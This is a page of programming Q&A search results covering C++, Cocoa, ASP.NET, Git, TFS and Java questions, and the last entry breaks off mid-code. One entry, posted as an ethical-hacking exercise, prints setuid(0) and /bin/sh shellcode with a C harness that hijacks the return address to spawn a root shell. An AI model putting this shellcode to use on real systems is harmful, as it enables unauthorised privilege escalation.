Search Results

Search found 23084 results on 924 pages for 'jeff main'.

Page 263/924 | < Previous Page | 259 260 261 262 263 264 265 266 267 268 269 270  | Next Page >

  • Thread-local storage segfaults on NetBSD only?

    - by bortzmeyer
    Trying to run a C++ program, I get segmentation faults which appear to be specific to NetBSD. Bert Hubert wrote the simple test program (at the end of this message) and, indeed, it crashes only on NetBSD.

        % uname -a
        NetBSD golgoth 5.0.1 NetBSD 5.0.1 (GENERIC) #0: Thu Oct 1 15:46:16 CEST 2009 +stephane@golgoth:/usr/obj/sys/arch/i386/compile/GENERIC i386
        % g++ --version
        g++ (GCC) 4.1.3 20080704 prerelease (NetBSD nb2 20081120)
        Copyright (C) 2006 Free Software Foundation, Inc.
        This is free software; see the source for copying conditions.  There is NO
        warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        % gdb thread-local-storage-powerdns
        GNU gdb 6.5
        Copyright (C) 2006 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        welcome to change it and/or distribute copies of it under certain conditions.
        Type "show copying" to see the conditions.
        There is absolutely no warranty for GDB.  Type "show warranty" for details.
        This GDB was configured as "i386--netbsdelf"...
        (gdb) run
        Starting program: /home/stephane/Programmation/C++/essais/thread-local-storage-powerdns

        Program received signal SIGSEGV, Segmentation fault.
        0x0804881b in main () at thread-local-storage-powerdns.cc:20
        20          t_a = new Bogo('a');
        (gdb)

    On other Unix, it works fine. Is there a known issue in NetBSD with C++ thread-local storage?

        #include <stdio.h>

        class Bogo
        {
        public:
            explicit Bogo(char a)
            {
                d_a = a;
            }

            char d_a;
        };

        __thread Bogo* t_a;

        int main()
        {
            t_a = new Bogo('a');
            Bogo* b = t_a;
            printf("%c\n", b->d_a);
        }
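    Not part of the original question, but if __thread turns out to be the culprit on this NetBSD release, one portable fallback is POSIX thread-specific data. A minimal sketch of the same test using pthread keys (assumes linking against the platform's pthread library):

        #include <pthread.h>
        #include <stdio.h>

        class Bogo
        {
        public:
            explicit Bogo(char a) : d_a(a) {}
            char d_a;
        };

        // Replaces: __thread Bogo* t_a;
        static pthread_key_t t_a_key;

        int main()
        {
            // Create the key once; a destructor could be passed instead of NULL
            // to free the stored value automatically at thread exit.
            pthread_key_create(&t_a_key, NULL);

            // Equivalent of: t_a = new Bogo('a');
            pthread_setspecific(t_a_key, new Bogo('a'));

            // Equivalent of: Bogo* b = t_a;
            Bogo* b = static_cast<Bogo*>(pthread_getspecific(t_a_key));
            printf("%c\n", b->d_a);

            delete b;
            pthread_key_delete(t_a_key);
            return 0;
        }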

    Read the article

  • Cocoa UI Elements Not Updating

    - by spamguy
    I have a few Cocoa UI elements with outlet connexions to an object instantiated within an NSView object, which is in turn put there by an NSViewController. These elements, a definite progress bar and a text label, are not updating: the progress bar is dead and empty despite having its value change constantly, the text label does not unhide through [textLabel setHidden:NO], and the text label does not change its string.

    What I know:

        - There's no difference between binding values and setting them in code. Nothing changes either way.
        - I've checked outlet connections. They're all there.
        - I've tried [X displayIfNeeded], where X has been the UI objects themselves, the containing NSView, and the main window. No difference.
        - [progressBar setUsesThreadedAnimation:YES] makes no difference. Interestingly, if I look at progressBar mid-program, _threadedAnimation is still NO.
        - The object holding all these outlets and performing an import operation is in an NSOperationQueue owned by the NSViewController object.

    Thanks!

    EDIT: As suggested, I called [self performSelectorOnMainThread:@selector(updateProgress:) withObject:[NSNumber numberWithInt:myObject] waitUntilDone:NO]. (I've also tried waitUntilDone:YES.) It's still not updating. The debugger clearly shows updateProgress: taking place in the main thread, so I don't know what's missing.

    Read the article

  • Error trying to use rand from std library cstdlib with g++

    - by Matt
    I was trying to use the random function in Ubuntu, compiling with g++ on a larger program, and for some reason rand just gave weird compile errors. For testing purposes I made the simplest program I could and it still gives errors.

    Program:

        #include <iostream>
        using std::cout;
        using std::endl;
        #include <cstdlib>

        int main()
        {
            cout << "Random number " << rand();
            return 0;
        }

    Error when compiling with the terminal:

        sudo g++ chapter_3/tester.cpp ./test
        ./test: In function `_start':
        /build/buildd/eglibc-2.10.1/csu/../sysdeps/i386/elf/start.S:65: multiple definition of `_start'
        /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crt1.o:/build/buildd/eglibc-2.10.1/csu/../sysdeps/i386/elf/start.S:65: first defined here
        ./test:(.rodata+0x0): multiple definition of `_fp_hw'
        /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crt1.o:(.rodata+0x0): first defined here
        ./test: In function `_fini':
        (.fini+0x0): multiple definition of `_fini'
        /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crti.o:(.fini+0x0): first defined here
        ./test:(.rodata+0x4): multiple definition of `_IO_stdin_used'
        /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crt1.o:(.rodata.cst4+0x0): first defined here
        ./test: In function `__data_start':
        (.data+0x0): multiple definition of `__data_start'
        /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crt1.o:(.data+0x0): first defined here
        ./test: In function `__data_start':
        (.data+0x4): multiple definition of `__dso_handle'
        /usr/lib/gcc/i486-linux-gnu/4.4.1/crtbegin.o:(.data+0x0): first defined here
        ./test: In function `main':
        (.text+0xb4): multiple definition of `main'
        /tmp/cceF0x0p.o:tester.cpp:(.text+0x0): first defined here
        ./test: In function `_init':
        (.init+0x0): multiple definition of `_init'
        /usr/lib/gcc/i486-linux-gnu/4.4.1/../../../../lib/crti.o:(.init+0x0): first defined here
        /usr/lib/gcc/i486-linux-gnu/4.4.1/crtend.o:(.dtors+0x0): multiple definition of `__DTOR_END__'
        ./test:(.dtors+0x4): first defined here
        /usr/bin/ld: error in ./test(.eh_frame); no .eh_frame_hdr table will be created.
        collect2: ld returned 1 exit status

    Read the article

  • SiteMap control based on user roles doesn't work

    - by nCdy
        <siteMapNode roles="*">
            <siteMapNode url="~/Default.aspx" title=" Main" description="Main" roles="*"/>
            <siteMapNode url="~/Items.aspx" title=" Adv" description="Adv" roles="Administrator"/>
            ....

    Any user can see the Adv page. That is the trouble and the question: why, and how do I hide sitemap nodes that are outside the user's roles? If I call HttpContext.Current.User.IsInRole("Administrator"), it does correctly tell me whether the user is in the Administrator role or not.

    web.config:

        <authentication mode="Forms"/>
        <membership defaultProvider="SqlProvider" userIsOnlineTimeWindow="20">
            <providers>
                <add connectionStringName="FlowWebSQL"
                     enablePasswordRetrieval="false"
                     enablePasswordReset="true"
                     requiresQuestionAndAnswer="true"
                     passwordFormat="Hashed"
                     applicationName="/"
                     name="SqlProvider"
                     type="System.Web.Security.SqlMembershipProvider"/>
            </providers>
        </membership>
        <roleManager enabled="true" defaultProvider="SqlProvider">
            <providers>
                <add connectionStringName="FlowWebSQL" name="SqlProvider" type="System.Web.Security.SqlRoleProvider" />
            </providers>
        </roleManager>

    Read the article

  • I have this code .... Ethical Hacking

    - by kmitnick
    hello folks, I am following this EBook about Ethical Hacking, and I reached the Linux Exploit Chapter. This is the code with Aleph1's shellcode:

        //shellcode.c
        char shellcode[] =      //setuid(0) & Aleph1's famous shellcode, see ref.
            "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"  //setuid(0) first
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        int main() {                  //main function
            int *ret;                 //ret pointer for manipulating saved return.
            ret = (int *)&ret + 2;    //set ret to point to the saved return
                                      //value on the stack.
            (*ret) = (int)shellcode;  //change the saved return value to the
                                      //address of the shellcode, so it executes.
        }

    I give this super user privileges with chmod u+s shellcode as a super user, then go back to a normal user with su - normal_user. But when I run ./shellcode I should become the root user; instead I stay normal_user. So, any help?

    By the way, I am working on BT4-Final, I turned off ASLR, and I am running BT4 in VMWare...

    Read the article

  • What's the equivalent of gcc's -mwindows option in cmake?

    - by Runner
    I'm following the tutorial at http://zetcode.com/tutorials/gtktutorial/firstprograms/. It works, but each time I double-click on the executable there is a console window, which I don't want there. How do I get rid of that console?

    I tried this:

        add_executable(Cmd WIN32 cmd.c)

    But got this fatal error:

        MSVCRTD.lib(crtexew.obj) : error LNK2019: unresolved external symbol _WinMain@16 referenced in function ___tmainCRTStartup
        Cmd.exe : fatal error LNK1120: 1 unresolved externals

    While using gcc directly works:

        gcc -o Cmd cmd.c -mwindows

    I'm guessing it has something to do with the entry function int main(int argc, char *argv[]), but why does gcc work? How can I make it work with cmake?

    UPDATE: Let me paste the source code here for convenience:

        #include <gtk/gtk.h>

        int main(int argc, char *argv[])
        {
            GtkWidget *window;

            gtk_init(&argc, &argv);

            window = gtk_window_new(GTK_WINDOW_TOPLEVEL);
            gtk_widget_show(window);

            gtk_main();

            return 0;
        }

    UPDATE2: Why does gcc -mwindows work but add_executable(Cmd WIN32 cmd.c) not? Maybe that's not the equivalent of -mwindows in cmake?

    Read the article

  • Git force complete sync to master

    - by Jesse
    My workplace uses Subversion for source control, so I have been playing around with git-svn for the advantages of my own branches, committing as often as I want without touching the main repo, etc. Since my git svn checkout is local, I have cloned it to a network share as well to act as a backup. My thinking is that if my desktop takes a dump I will at least have the repo on the network share to get changes that I have not had a chance to dcommit yet.

    My workflow is to work from the desktop, make changes, commit, etc. At the end of the day I want to update the repo on the network share with all of my current changes. I had set up the repo on the network share using git clone repo_on_my_desktop and then updated the repo on the network share with git pull origin master.

    The problem that I am running into is when I do a git rebase to squish multiple commits prior to dcommitting to the main svn repository. When I do this, I get merge conflicts in the repo on the network share when I try to back up at night. Is there a way to simply sync entirely with the repository on my desktop without doing a new git clone each night?

    Read the article

  • Newb Question: passing objects in java?

    - by Adam Outler
    Hello, I am new at Java. I am doing the following: read from a file, then put the data into a variable.

        checkToken = lineToken.nextToken();
        processlinetoken()
        }

    But then when I try to process it...

        public static void readFile(String fromFile) throws IOException {
            BufferedReader reader = new BufferedReader(new FileReader(fromFile));
            String line = null;
            while ((line=reader.readLine()) != null ) {
                if (line.length() >= 2) {
                    StringTokenizer lineToken = new StringTokenizer (line);
                    checkToken = lineToken.nextToken();
                    processlinetoken()
        ......

    But here's where I run into a problem:

        public static void processlinetoken()
            checkToken=lineToken.nextToken();
        }

    It fails with:

        Exception in thread "main" java.lang.Error: Unresolved compilation problem:
            The method nextToken() is undefined for the type String
            at testread.getEngineLoad(testread.java:243)
            at testread.readFile(testread.java:149)
            at testread.main(testread.java:119)

    So how do I get this to work? It seems to pass the variable, but nothing after the . works.

    Read the article

  • TFS Folders - Getting them to work like Subversion "Trunk/Tags/Branches"

    - by Sam Schutte
    I recently started using Team Foundation Server, and am having some trouble getting it to work the way I want it to. I've used Subversion for a couple years now, and love the way it works. I always set up three folders under each project: Trunk, Tags, and Branches. When I'm working on a project, all my code lives under a folder called "C:\dev\projectname". This "projectname" folder can be made to point to either trunk, or any of the branches or tags using Subversion (with the switch command).

    Now that I'm using TFS (my client's system), I'd like things to work the same way. I created a "Trunk" folder with my project in it, and mapped "Project/Trunk/Website" to "c:\dev\Website". Now, I want to make a release under the "tags" folder (located in "Project/Tags/Version 1.0/Website"), and TFS is giving me the following error when I execute the branch command:

        No appropriate mapping exists for $Project/tags/Version 1.0/Website

    From what I can find on the internet, TFS expects you to have a mapping to your hard drive at the root of the project (the "Project" folder in my case), and then have all the source code that lives in trunk, tags and branches all pulled down to your hard drive. This sucks because it requires way too much stuff on your hard drive, and even worse, when you are working in a solution in Visual Studio, you won't be able to pull down "Version 2.0" and have all your project references to other projects work, because they'll all be pointing to "trunk" folders under the main folder, not just the main folder itself.

    What I want to do is have the root "Project/Website" folder on my hard drive, and be able to have it point to (mapped to) either tags, branches, or trunk, depending on what I'm doing, without having to screw around with fixing Visual Studio project references. Ideas?

    Read the article

  • My 3D object (opengl es) is disappearing behind the iPhone camera view

    - by KLC
    I have an augmented reality iPhone app that I am converting from Core Animation to OpenGL ES 1.1. I have added code that has been modified from the Apple OpenGL template. My problem is that my 3D object, when translating along the negative Z-axis (away from the user), appears to disappear into the camera view, until it is completely gone. I have experimented with several solutions, but to no avail.

    What I have determined: using the 3D icosahedron from Jeff Lamarche's blog here, the object starts at 0,0,0 and then translates with decreasing z coordinates. By the time the z value reaches -2.0f, the object is gone. It appears as if it is disappearing behind the camera view.

    This is how I set my frustum & viewport (unchanged from Apple's code):

        glMatrixMode(GL_PROJECTION);
        size = zNear * tanf(DEGREES_TO_RADIANS(fieldOfView) / 2.0);

        //Grab the size of the screen
        CGRect rect = self.bounds;
        glFrustumf(-size, size,
                   -size / (rect.size.width / rect.size.height),
                   size / (rect.size.width / rect.size.height),
                   zNear, zFar);
        glViewport(0, 0, rect.size.width, rect.size.height);

        glMatrixMode(GL_MODELVIEW);
        glLoadIdentity();

    What I have tried: The camera view is the main view and several other views are added to it as subviews, including the openGLView. I have commented those views out for test purposes. I have applied CATransforms to move the openGLView in the z direction -500 and +500, and done the same to the camera view. I have also changed the zFar in the above code to 1.0f, and it still disappears at a z position of -2.0, which doesn't make sense (shouldn't it disappear at z=1.0?). My experimentation has got me more confused than when I started (which usually means I am missing a key piece, but I can't figure out what). Thanks for your help.

    Read the article

  • How can I reuse .NET resources in multiple executables?

    - by Brandon
    I have an existing application that I'm supposed to take and create a "mini" version of. Both are localized apps and we would like to reuse the resources in the main application as is. So, here's the basic structure of my apps:

        MainApplication.csproj
            /Properties/Resources.resx
            /MainUserControl.xaml       (uses strings in Properties/Resources.resx)
            /MainUserControl.xaml.cs

        MiniApplication.csproj
            link to MainApplication/Properties/Resources.resx
            link to MainApplication/MainUserControl.xaml
            link to MainApplication/MainUserControl.xaml.cs
            MiniApplication.xaml        (tries to use MainUserControl from MainApplication link)

    So, in summary, I've added the needed resources and user control from the main application as links in the mini application. However, when I run the mini application, I get the following exception. I'm guessing it's having trouble with the different namespaces, but how do I fix it?

        Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "MainApplication.Properties.Resources.resources" was correctly embedded or linked into assembly "MiniApplication" at compile time, or that all the satellite assemblies required are loadable and fully signed.

    FYI, I know I could put the user control in a user control library, but the problem is that the mini application needs to have a small footprint. So, we only want to include what we need.

    Read the article

  • User entered value validation and level of error catching

    - by Terry
    May I ask whether error catching code should be placed at the lowest level or at the top? I am not sure what the best practice is. I prefer placing it at the bottom, as in example a.

    Example a:

        public static void Main(string[] args)
        {
            string operation = args[0];
            int value = Convert.ToInt32(args[1]);

            if (operation == "date")
            {
                DoDate(value);
            }
            else if (operation == "month")
            {
                DoMonth(value);
            }
        }

        public static void DoMonth(int month)
        {
            if (month < 1 || month > 12)
            {
                throw new Exception("");
            }
        }

        public static void DoDate(int date)
        {
            if (date < 1 || date > 31)
            {
                throw new Exception("");
            }
        }

    or example b:

        public static void Main(string[] args)
        {
            string operation = args[0];
            int value = Convert.ToInt32(args[1]);

            if (operation == "date" && (date < 1 || date > 12))
            {
                throw new Exception("");
            }
            else if (operation == "month" && (month < 1 || month > 31))
            {
                throw new Exception("");
            }

            if (operation == "date")
            {
                DoDate(value);
            }
            else if (operation == "month")
            {
                DoMonth(value);
            }
        }

        public static void DoMonth(int month)
        {
        }

        public static void DoDate(int date)
        {
        }

    Read the article

  • Temporary non-const istream reference in constructor (C++)

    - by Christopher Bruns
    It seems that a constructor that takes a non-const reference to an istream cannot be constructed with a temporary value in C++.

        #include <iostream>
        #include <sstream>

        using namespace std;

        class Bar
        {
        public:
            explicit Bar(std::istream& is) {}
        };

        int main()
        {
            istringstream stream1("bar1");
            Bar bar1(stream1); // OK on all platforms

            // compile error on linux, Mac gcc; OK on Windows MSVC
            Bar bar2(istringstream("bar2"));

            return 0;
        }

    This compiles fine with MSVC, but not with gcc. Using gcc I get a compile error:

        g++ test.cpp -o test
        test.cpp: In function ‘int main()’:
        test.cpp:18: error: no matching function for call to ‘Bar::Bar(std::istringstream)’
        test.cpp:9: note: candidates are: Bar::Bar(std::istream&)
        test.cpp:7: note:                 Bar::Bar(const Bar&)

    Is there something philosophically wrong with the second way (bar2) of constructing a Bar object? It looks nicer to me, and does not require that stream1 variable that is only needed for a moment.
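    Not from the original post, but a minimal sketch of the usual workarounds may help frame the question: the C++ rule is that a temporary (an rvalue) cannot bind to a non-const lvalue reference, which is exactly what gcc enforces and MSVC relaxes as a non-conforming extension. Either name the stream, or call a member function that returns istream& on the temporary (a known idiom that is safe as long as Bar does not store the reference past the full expression):

        #include <iostream>
        #include <sstream>
        #include <string>

        class Bar
        {
        public:
            explicit Bar(std::istream& is) { is >> text; }
            std::string text;
        };

        int main()
        {
            // Option 1: give the temporary a name; a named lvalue binds fine.
            {
                std::istringstream stream("bar2");
                Bar bar2(stream);
                std::cout << bar2.text << '\n';
            }

            // Option 2: seekg(0) returns std::istream&, and member calls are
            // allowed on temporaries; the temporary lives until the end of the
            // full expression, which covers the constructor call.
            Bar bar3(std::istringstream("bar3").seekg(0));
            std::cout << bar3.text << '\n';

            return 0;
        }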

    Read the article

  • What am I missing in the following buttons code?

    - by Ayush Goyal
    I am trying to increment and decrement the middle TextView via buttons on the sides. The application starts up fine, but as soon as I click either of the buttons it closes with the following error:

        Error: process <package> has stopped unexpectedly.

    My main.xml:

        <?xml version="1.0" encoding="utf-8"?>

        <Button
            android:id="@+id/button1"
            android:layout_width="50dp"
            android:layout_height="250dp"
            android:text="+"
            android:textSize="40dp" />

        <TextView
            android:id="@+id/tv1"
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:text="0"
            android:textSize="80dp"
            android:layout_toRightOf="@+id/button1"
            android:layout_marginTop="75dp"
            android:layout_marginLeft="80dp" />

        <Button
            android:id="@+id/button2"
            android:layout_width="50dp"
            android:layout_height="250dp"
            android:layout_alignParentRight="true"
            android:text="-"
            android:textSize="40dp" />

    My java file:

        public class IncrementDecrementActivity extends Activity {

            int counter;
            Button add, sub;
            TextView tv;

            /** Called when the activity is first created. */
            @Override
            public void onCreate(Bundle savedInstanceState) {
                super.onCreate(savedInstanceState);
                setContentView(R.layout.main);

                add = (Button) findViewById(R.id.button1);
                sub = (Button) findViewById(R.id.button2);
                tv = (TextView) findViewById(R.id.tv1);

                add.setOnClickListener(new View.OnClickListener() {
                    @Override
                    public void onClick(View v) {
                        counter++;
                        tv.setText(counter);
                    }
                });

                sub.setOnClickListener(new View.OnClickListener() {
                    @Override
                    public void onClick(View v) {
                        counter--;
                        tv.setText(counter);
                    }
                });
            }
        }

    Read the article

  • TreeMap sort by value

    - by vito huang
    I'm new to Java. I want to write a comparator that will let me sort a TreeMap by value instead of the default natural ordering. I tried something like this, but can't find out what went wrong:

        import java.util.*;

        class treeMap {
            public static void main(String[] args) {
                System.out.println("the main");
                byValue cmp = new byValue();
                Map<String, Integer> map = new TreeMap<String, Integer>(cmp);
                map.put("de", 10);
                map.put("ab", 20);
                map.put("a", 5);

                for (Map.Entry<String, Integer> pair : map.entrySet()) {
                    System.out.println(pair.getKey() + ":" + pair.getValue());
                }
            }
        }

        class byValue implements Comparator<Map.Entry<String, Integer>> {
            public int compare(Map.Entry<String, Integer> e1, Map.Entry<String, Integer> e2) {
                if (e1.getValue() < e2.getValue()) {
                    return 1;
                } else if (e1.getValue() == e2.getValue()) {
                    return 0;
                } else {
                    return -1;
                }
            }
        }

    I guess what I am asking is: what controls what gets passed to the comparator function? Can I get a Map.Entry passed to the comparator?

    Read the article

  • help on ejb stateless datagram and message driven beans

    - by Kemmal
    I have a client that is sending a message to the EJB server using UDP. I want the server (a stateless bean) to echo the message back to the client, but I can't seem to do this. Or can I implement the same logic using JMS? Please help and enlighten. This is just a test; in the end I want a MIDP client to send the message to the EJB using datagrams. Here is my code:

        @Stateless
        public class SessionFacadeBean implements SessionFacadeRemote {

            public SessionFacadeBean() {
            }

            public static void main(String[] args) {
                DatagramSocket aSocket = null;
                byte[] buffer = null;
                try {
                    while (true) {
                        DatagramPacket request = new DatagramPacket(buffer, buffer.length);
                        aSocket.receive(request);
                        DatagramPacket reply = new DatagramPacket(request.getData(),
                                request.getLength(), request.getAddress(), request.getPort());
                        aSocket.send(reply);
                    }
                } catch (SocketException e) {
                    System.out.println("Socket: " + e.getMessage());
                } catch (IOException e) {
                    System.out.println("IO: " + e.getMessage());
                } finally {
                    if (aSocket != null)
                        aSocket.close();
                }
            }
        }

    and the client:

        public static void main(String[] args) {
            DatagramSocket aSocket = null;
            try {
                aSocket = new DatagramSocket();
                byte[] m = "Test message!".getBytes();
                InetAddress aHost = InetAddress.getByName("localhost");
                int serverPort = 6789;
                DatagramPacket request = new DatagramPacket(m, m.length, aHost, serverPort);
                aSocket.send(request);

                byte[] buffer = new byte[1000];
                DatagramPacket reply = new DatagramPacket(buffer, buffer.length);
                aSocket.receive(reply);
                System.out.println("Reply: " + new String(reply.getData()));
            } catch (SocketException e) {
                System.out.println("Socket: " + e.getMessage());
            } catch (IOException e) {
                System.out.println("IO: " + e.getMessage());
            } finally {
                if (aSocket != null)
                    aSocket.close();
            }
        }

    Please help.

    Read the article

  • GUI toolkit for Unicode text app?

    - by wrp
    In developing a tool for processing text in exotic scripts, I'm having trouble choosing a GUI toolkit. The main part of the interface is to be a text editor, not much more elaborate than Notepad, but with its own input method editor. It is to be extensible in a scripting language so that non-programmers can develop their own input methods and display routines. It will be assumed that all files are UTF-8. More elaborate support like regexes is not needed.

    The main sticking points are:

        - characters beyond the Basic Multilingual Plane
        - right-to-left and bi-directional text
        - extension in a scripting language
        - cross-platform Linux/Windows/OS X

    My first choice was Tcl/Tk, but it lacks bidi and going beyond the BMP seems dodgy. At the other extreme, I've considered Qt with embedded ECMAScript, but that might be heavier and less malleable than I would like. I'm even thinking about making it browser based, but I'm concerned that the IM for large scripts would be too heavy for client-side processing. I've also looked at a few similar projects in Java, but the quality of the font rendering in SWING has been unacceptable.

    What are your experiences in handling Unicode with various toolkits? Are there other serious issues I haven't considered? What would you recommend for doing this in the lightest way?

    Read the article

  • How to authenticate my own provider (only for testing purposes)

    - by user308806
    Dear all, I wrote a new provider (ESMJCE provider), and I also wrote a simple application to test it, but I get an exception like this:

        java.lang.SecurityException: JCE cannot authenticate the provider ESMJCE
            at javax.crypto.Cipher.getInstance(DashoA13*..)
            at javax.crypto.Cipher.getInstance(DashoA13*..)
            at testprovider.main(testprovider.java:27)
        Caused by: java.util.jar.JarException: Cannot parse file:/C:/Program%20Files/Java/jre1.6.0_02/lib/ext/abc.jar
            at javax.crypto.SunJCE_c.a(DashoA13*..)
            at javax.crypto.SunJCE_b.b(DashoA13*..)
            at javax.crypto.SunJCE_b.a(DashoA13*..)
            ... 3 more

    And here is my source code:

        import java.security.Provider;
        import java.security.Security;
        import javax.crypto.Cipher;
        import esm.jce.provider.ESMProvider;

        public class testprovider {

            /** @param args */
            public static void main(String[] args) {
                // TODO Auto-generated method stub
                ESMProvider esmprovider = new esm.jce.provider.ESMProvider();
                Security.insertProviderAt(esmprovider, 2);

                Provider[] temp = Security.getProviders();
                for (int i = 0; i < temp.length; i++) {
                    System.out.println("Providers: " + temp[i].getName());
                }

                try {
                    Cipher cipher = Cipher.getInstance("DES", "ESMJCE");
                    System.out.println("Cipher: " + cipher);
                    int blockSize = cipher.getBlockSize();
                    System.out.println("blockSize= " + blockSize);
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        }

    Please help me solve this issue. Thanks.

    Read the article

  • eclipse django using wrong settings.py in pythonpath

    - by user1290264
    I have pydev/django installed in eclipse, and it runs fine. However, after adding a second django project to eclipse and running the server (http://127.0.0.1:8000), the pythonpath seems to be stuck on project2 even when I run project1.

    As a summary, I have two django projects: project1 and project2. When I run the django server for project1 I get:

        Validating models...

        0 errors found
        Django version 1.5, using settings 'project1.settings'
        Development server is running at http://127.0.0.1:8000/
        Quit the server with CTRL-BREAK.

    The above seems to suggest that django is using the correct settings file; however, when I go to http://127.0.0.1:8000/ it displays the urls from project2. Also, if I go to http://127.0.0.1:8000/admin the models are getting pulled from the sqlite.db file in project2 as well.

    I've even tried removing project2 from eclipse entirely and now at http://127.0.0.1:8000/admin I get this error:

        Python Path: ['C:\Users\Brad\workspaces\In Progress\project2', 'C:\Users\Brad\workspaces\In Progress\project2', 'C:\Python27\DLLs', 'C:\Python27\lib', 'C:\Python27\lib\plat-win', 'C:\Python27\lib\lib-tk', 'C:\Python27', 'C:\Python27\lib\site-packages', 'C:\Windows\system32\python27.zip']

    If I run the server on a different port with project1, the path seems to be fine:

        runserver 7000 --noreload

    Then http://127.0.0.1:7000/ uses project1's paths, but it doesn't seem like I should have to do this.

    Note: I have set up the run configurations as correctly as I know how. In the main tab, the project and main module both point to the correct project (project1), and the "PYTHONPATH that will be used in the run:" includes project1. Also, I have cleared my browser history, cookies, and everything that chrome would let me delete.

    Read the article

  • FILE* issue PPU side code

    - by Cristina
    We are working on a homework assignment on CELL programming for college, and their feedback on our questions is kind of slow, so I thought I could get some faster answers here.

    I have PPU-side code which tries to open a file passed down through char* argv[]; however this doesn't work: the assignment to the pointer fails and I get NULL. My first idea was that the file isn't in the correct directory, so I copied it to every possible and logical place. My second idea is that maybe the PPU wants this pointer in its LS area, but I can't deduce whether that's the bug or not.

    So... my question is: what am I doing wrong? I am working with a Fedora 7 SDK Cell, with Eclipse as an IDE. Maybe my argument setup is wrong, though it gets the name of the file correctly.

    Code on request:

        images_t *read_bin_data(char *name)
        {
            FILE *file;
            images_t *img;
            uint32_t *buffer;
            uint8_t buf;
            unsigned long fileLen;
            unsigned long i;

            //Open file
            file = (FILE*)malloc(sizeof(FILE));
            file = fopen(name, "rb");
            printf("[Debug]Opening file %s\n", name);
            if (!file)
            {
                fprintf(stderr, "Unable to open file %s", name);
                return NULL;
            }
            //.......
        }

    Main launch:

        int main(int argc, char* argv[])
        {
            int i, img_width;
            int modif_this[4] __attribute__ ((aligned(16))) = {1, 2, 3, 4};
            images_t *faces, *nonfaces;
            spe_context_ptr_t ctxs[SPU_THREADS];
            pthread_t threads[SPU_THREADS];
            thread_arg_t arg[SPU_THREADS];

            //initialize img_width
            img_width = atoi(argv[1]);
            printf("[Debug]Img size is %i\n", img_width);

            faces = read_bin_data(argv[3]);
            //.......
        }

    Thanks for the help.
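    A guess at the immediate issues, sketched below rather than taken from the original thread: fopen() allocates and returns its own FILE object, so the malloc(sizeof(FILE)) result is overwritten and leaked, and a NULL return from fopen usually just means the path in argv[3] is wrong relative to the working directory the program was launched from (perror reveals the OS reason). A minimal, hedged version of the open logic with a hypothetical helper name:

        #include <stdio.h>
        #include <stdlib.h>

        /* Hypothetical helper: open the file named on the command line and
           report path/permission problems explicitly. */
        static FILE *open_bin_data(const char *name)
        {
            /* No malloc needed: fopen() hands back a FILE* managed by the C library. */
            FILE *file = fopen(name, "rb");
            if (!file) {
                /* perror prints the OS reason, e.g. "No such file or directory",
                   which tells you whether the path or the permissions are at fault. */
                perror(name);
                return NULL;
            }
            printf("[Debug] Opened file %s\n", name);
            return file;
        }

        int main(int argc, char *argv[])
        {
            if (argc < 4) {                    /* the original code reads argv[3] */
                fprintf(stderr, "usage: %s <img_width> <arg2> <faces-file>\n", argv[0]);
                return 1;
            }

            FILE *f = open_bin_data(argv[3]);
            if (!f)
                return 1;

            /* ... read the data here ... */

            fclose(f);
            return 0;
        }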

    Read the article

  • C# vs C - Big performance difference

    - by John
    I'm finding massive performance differences between similar code in C and C#.

    The C code is:

        #include <stdio.h>
        #include <time.h>
        #include <math.h>

        main()
        {
            int i;
            double root;
            clock_t start = clock();
            for (i = 0 ; i <= 100000000; i++){
                root = sqrt(i);
            }
            printf("Time elapsed: %f\n", ((double)clock() - start) / CLOCKS_PER_SEC);
        }

    And the C# (console app) is:

        using System;
        using System.Collections.Generic;
        using System.Text;

        namespace ConsoleApplication2
        {
            class Program
            {
                static void Main(string[] args)
                {
                    DateTime startTime = DateTime.Now;
                    double root;
                    for (int i = 0; i <= 100000000; i++)
                    {
                        root = Math.Sqrt(i);
                    }
                    TimeSpan runTime = DateTime.Now - startTime;
                    Console.WriteLine("Time elapsed: " + Convert.ToString(runTime.TotalMilliseconds/1000));
                }
            }
        }

    With the above code, the C# completes in 0.328125 seconds (release version) and the C takes 11.14 seconds to run. The C is being compiled to a Windows executable using MinGW.

    I've always been under the assumption that C/C++ were faster than, or at least comparable to, C#.net. What exactly is causing the C to run over 30 times slower?

    EDIT: It does appear that the C# optimizer was removing the root as it wasn't being used. I changed the root assignment to root += and printed out the total at the end. I've also compiled the C using cl.exe with the /O2 flag set for max speed. The results are now:

        3.75 seconds for the C
        2.61 seconds for the C#

    The C is still taking longer, but this is acceptable.
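    For reference, a sketch of a fairer C-side benchmark along the lines of the edit above (an illustration, not code from the original post; absolute timings depend entirely on the machine and flags). The point is just to keep the result live so the compiler cannot delete the loop; built with optimization enabled (e.g. gcc -O2 or cl /O2), both languages then measure the sqrt loop rather than unoptimized code:

        #include <stdio.h>
        #include <time.h>
        #include <math.h>

        int main(void)
        {
            int i;
            double sum = 0.0;            /* accumulate so the loop has an observable result */
            clock_t start = clock();

            for (i = 0; i <= 100000000; i++) {
                sum += sqrt((double)i);
            }

            /* Printing sum forces the compiler to keep the computation. */
            printf("Time elapsed: %f (sum = %f)\n",
                   ((double)clock() - start) / CLOCKS_PER_SEC, sum);
            return 0;
        }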

    Read the article

  • If statement is ignored

    - by user2898120
    I am making a simple matchmaker as a learning project in Java. My program so far just asks a few questions, but I wanted to do gender-specific questions, so I asked for the user's sex (m or f) and then attempted to add a message that only shows if the sex is m. The dialog should say "well done, you are male!"; otherwise it restarts the method. Every time, no matter what I type, it restarts the program. Here is my code:

        import javax.swing.JOptionPane;

        public class Main {

            public static void main(String[] args){
                setVars();
            }

            public static void setVars(){
                String name = JOptionPane.showInputDialog(null, "What is your name?");
